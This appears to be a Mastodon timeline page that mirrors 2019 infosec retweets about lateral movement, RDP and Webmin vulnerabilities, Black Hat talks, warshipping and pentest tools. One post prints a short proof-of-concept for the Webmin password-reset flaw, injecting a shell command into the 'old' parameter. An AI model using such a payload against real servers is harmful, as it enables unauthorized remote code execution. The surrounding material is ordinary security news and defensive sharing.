RT @gabsmashh@twitter.com

a good guide to the basics of offensive lateral movement/pivoting, including psexec, DCOM, WMI, winRM, etc. the guide uses cobaltstrike for most of the demo, which is superrrr fun (albeit noisy) to play with, if you haven't.
hausec.com/2019/08/12/offensiv

🐦🔗: twitter.com/gabsmashh/status/1

RT @shishi0_@twitter.com

"Webmin 0day remote code execution"

Tl;Dr: Lack of input validation in the reset password function allows RCE (CVE-2019-15107). Over 13 0000 vulnerable on Shodan.

PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id

pentest.com.tr/exploits/DEFCON

🐦🔗: twitter.com/shishi0_/status/11

RT @TencentTic@twitter.com

Tencent Security Team has worked out a stable POC of CVE-2019-1181/1182. It works on Win7 to Win10. Patch your system as soon as possible. REF:
s.tencent.com/research/bsafe/7

🐦🔗: twitter.com/TencentTic/status/

RT @piotrcki@twitter.com

⚠️ Arretez tout et allez mettre à jour vos Windows. ⚠️ (Merci à @ANSSI_FR@twitter.com @CERT_FR@twitter.com)
cert.ssi.gouv.fr/alerte/CERTFR

🐦🔗: twitter.com/piotrcki/status/11

RT @5aelo@twitter.com

In case you missed @natashenka@twitter.com's talk at @BlackHatEvents@twitter.com this week, here is a video showing a remote exploit for one of the iMessage bugs we found: youtu.be/E_9kBFKNx54 Be sure to read googleprojectzero.blogspot.com if you are interested in these kinds of attacks!

🐦🔗: twitter.com/5aelo/status/11598

RT @PyroTek3@twitter.com

Today at Black Hat @markmorow@twitter.com
& I presented on "Attacking & Defending the Microsoft Cloud."

Slides are now available to download:
adsecurity.org/?p=4179

We covered several attacks (& defense): password spray, token theft, password reuse, on-prem cloud integration, & more!

🐦🔗: twitter.com/PyroTek3/status/11

RT @zackwhittaker@twitter.com

Hey @TimiHealth@twitter.com. You might want to check your email. I'm going to hazard a guess and say this is probably not good.

🐦🔗: twitter.com/zackwhittaker/stat

RT @campuscodi@twitter.com

IBM X-Force details new "warshipping" technique that relies on criminal groups shipping packages with malicious WiFi equipment within a company's network range, so they can perform wireless attacks on the internal network

securityintelligence.com/posts

🐦🔗: twitter.com/campuscodi/status/

Captain, we've detected a disturbance in space-time. It's coming from Earth. Someone audited the Kubernetes source • The Register theregister.co.uk/2019/08/06/k

RT @evilsocket@twitter.com

You can turn a cheap rpi0w into a plug and play ethernet gadget to upgrade any device to a pentest platform. Nexmon allows monitor mode on the default WiFi running @bettercap@twitter.com and its web UI. Boots in seconds, deauths and gets handshakes like a mf 😬

🐦🔗: twitter.com/evilsocket/status/

RT @_saadk@twitter.com

Interesting: ‘“GitHub knew or should have known that obviously hacked data had been posted to GitHub.com,” […] The plaintiffs believe that because Social Security numbers had a fixed format, GitHub should have been able to identify and remove this data’ twitter.com/jedisct1/status/11

🐦🔗: twitter.com/_saadk/status/1157

RT @philofishal@twitter.com

Thanks to @SentinelOne@twitter.com @patrickwardle@twitter.com, my free ebook of How To Reverse Malware is now available. Learn to set up a safe test lab, find samples, static + dynamic analysis. eBook is free; tools you need are free. 😁go.sentinelone.com/ebook-macos

🐦🔗: twitter.com/philofishal/status

RT @Hydraze@twitter.com

NIST has released a new document around best practices on MFA/Risk based auth. for e-commerce: nvlpubs.nist.gov/nistpubs/Spec
(Bonus: it aligns with SP-800-63 and is really detailed architecture-wise)

🐦🔗: twitter.com/Hydraze/status/115

RT @binitamshah@twitter.com

PowerHub : A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting : github.com/AdrianVollmer/Power

🐦🔗: twitter.com/binitamshah/status

RT @jupitersignal@twitter.com

A new @bsdnow@twitter.com is OUT! okt.to/ZoTCWB @dragonflybsd@twitter.com Project Update - colo upgrade, future trends, resuming ZFS send, realtime bandwidth terminal graph visualization, fixing telnet fixes, a chapter from the FBI’s history with @openbsd@twitter.com and an OpenSSH vuln.

🐦🔗: twitter.com/jupitersignal/stat

Show more
Mastodon

On « Tweet » sur Twitter ; on « Toot » sur Mastodon. Sur ce réseau social plein de libertés, TeDomum met à disposition une modeste instance. N'hésitez pas à nous solliciter pour la modération ou des ajustements de configuration.